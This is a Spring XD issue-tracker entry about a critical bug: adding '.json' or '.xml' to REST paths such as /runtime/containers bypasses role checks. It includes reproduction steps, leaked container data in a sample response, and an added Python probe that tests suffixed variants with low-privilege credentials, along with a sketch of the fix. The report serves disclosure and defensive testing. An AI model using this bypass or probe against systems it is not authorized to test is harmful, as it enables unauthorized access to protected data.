Spring XD / XD-2872

Able to bypass authorization checks by appending ".json" or ".xml"

This issue belongs to an archived project. You can view it, but you can't modify it.

Details

    • Type: Bug
    • Status: Done
    • Priority: Critical
    • Resolution: Complete
    • Affects Version: 1.1.1
    • Fix Version: 1.2 RC1
    • Component: REST

    Description

      How to reproduce:

      1) Enable security
      2) Use a user that has the following role only: "ROLE_CREATE"
      3) Make a normal REST call:

      http://localhost:9393/runtime/containers

      yields the desired response:

          {
             "timestamp": "2015-03-26T16:51:17.010Z",
             "status": 403,
             "error": "Forbidden",
             "message": "Access is denied",
             "path": "/runtime/containers"
          }
      

      Now try:

      http://localhost:9393/runtime/containers.json

      This produces:

          {
             "links":
             [
                 {
                     "rel": "self",
                     "href": "http://localhost:9393/runtime/containers{?page,size,sort}"
                 }
             ],
             "content":
             [
                 {
                     "containerId": "86eea5aa-b18e-41c5-a3f5-42dfa10713c1",
                     "groups": "",
                     "deploymentSize": 0,
                     "deployedModules":
                     [
                     ],
                     "messageRates": null,
                     "attributes":
                     {
                         "ip": "10.0.1.119",
                         "host": "INTEGRATION.local",
                         "groups": "",
                         "pid": "52686",
                         "id": "86eea5aa-b18e-41c5-a3f5-42dfa10713c1"
                     },
                     "links":
                     [
                         {
                             "rel": "self",
                             "href": "http://localhost:9393/runtime/containers/86eea5aa-b18e-41c5-a3f5-42dfa10713c1"
                         }
                     ]
                 }
             ],
             "page":
             {
                 "size": 20,
                 "totalElements": 1,
                 "totalPages": 1,
                 "number": 0
             }
          }
      
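      The mechanism behind the report is a mismatch between two path matchers. Spring MVC of this era matched requests by suffix pattern, so "/runtime/containers.json" (or ".xml") dispatches to the same handler as "/runtime/containers", while a Spring Security URL rule written for the exact path "/runtime/containers" never sees the suffixed request and lets it fall through. The probe below is an added example, not code from the issue or from Spring XD: it requests a protected path and each suffixed variant with the same low-privilege credentials and reports any variant that succeeds where the plain path is denied. Everything after the urllib helper (`PROTECTED`, `handler_stem`, `vulnerable_server`, `fixed_server`) is a constructed stand-in so the script runs offline; it models the mismatch, not Spring's actual matcher code. The trailing-slash variant is an assumption added beyond the report (Spring MVC also matched "/runtime/containers/" by default, and an exact-path rule misses it the same way).

```python
"""Probe REST paths for suffix-based authorization bypass (added example)."""
import base64
import sys
import urllib.error
import urllib.request

# ".json" and ".xml" are the two suffixes from the report. The trailing slash
# is an added sibling case (assumption, see lead-in).
SUFFIXES = (".json", ".xml", "/")


def probe_path(fetch, path, suffixes=SUFFIXES):
    """Compare the status of `path` against each suffixed variant.

    `fetch(path)` must return an HTTP status code. A finding is any variant
    that succeeds (2xx) while the plain path is denied (401/403).
    """
    base_status = fetch(path)
    if base_status not in (401, 403):
        return []  # plain path is already reachable; nothing to bypass
    findings = []
    for suffix in suffixes:
        variant = path + suffix
        status = fetch(variant)
        if 200 <= status < 300:
            findings.append((variant, status))
    return findings


def http_fetch(base_url, username, password, timeout=10):
    """Return a fetch callable that talks to a real server with HTTP Basic auth."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    headers = {"Authorization": "Basic " + token, "Accept": "application/json"}

    def fetch(path):
        req = urllib.request.Request(base_url + path, headers=headers)
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status
        except urllib.error.HTTPError as err:
            return err.code

    return fetch


# --- Constructed stand-ins so the script runs offline (not Spring XD code) ---
# Both model the rule "ROLE_VIEW required for /runtime/containers" placed in
# front of a controller that, like suffix pattern matching, answers
# "/runtime/containers", "/runtime/containers.json", ".xml" and a trailing "/".
PROTECTED = {"/runtime/containers": {"ROLE_VIEW"}}


def handler_stem(path):
    """Path as the controller sees it: extension and trailing slash stripped."""
    stem = path.rstrip("/") or "/"
    for ext in (".json", ".xml"):
        if stem.endswith(ext):
            stem = stem[: -len(ext)]
    return stem


def vulnerable_server(user_roles):
    """Authorizes on the raw request path (exact match), then dispatches."""
    def fetch(path):
        required = PROTECTED.get(path)      # ".json" variant: no rule matches
        if required and not (required & user_roles):
            return 403
        return 200 if handler_stem(path) in PROTECTED else 404
    return fetch


def fixed_server(user_roles):
    """Authorizes on the same normalized path the controller dispatches on."""
    def fetch(path):
        stem = handler_stem(path)
        required = PROTECTED.get(stem)
        if required and not (required & user_roles):
            return 403
        return 200 if stem in PROTECTED else 404
    return fetch


if __name__ == "__main__":
    if len(sys.argv) == 4:   # python probe.py http://host:9393 user password
        fetch = http_fetch(*sys.argv[1:4])
    else:                    # offline demo against the vulnerable stand-in
        fetch = vulnerable_server({"ROLE_CREATE"})
    for variant, status in probe_path(fetch, "/runtime/containers"):
        print(f"BYPASS: {variant} -> {status}")
```

      Run with no arguments to see the three variants reported against the stand-in; run with a base URL and the ROLE_CREATE credentials to repeat the check against a real deployment. The `fixed_server` stand-in shows the principle of the remedy (authorize on the same path form the dispatcher uses), not the change the project made; in Spring terms the usual options are to turn off suffix pattern matching in the MVC path configuration or to write the security patterns so that they also cover the suffixed and trailing-slash forms.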

People

  Assignee: Gunnar Hillert (hillert)
  Reporter: Gunnar Hillert (hillert)
  Archiver: Trevor Marshall (tmarshall)
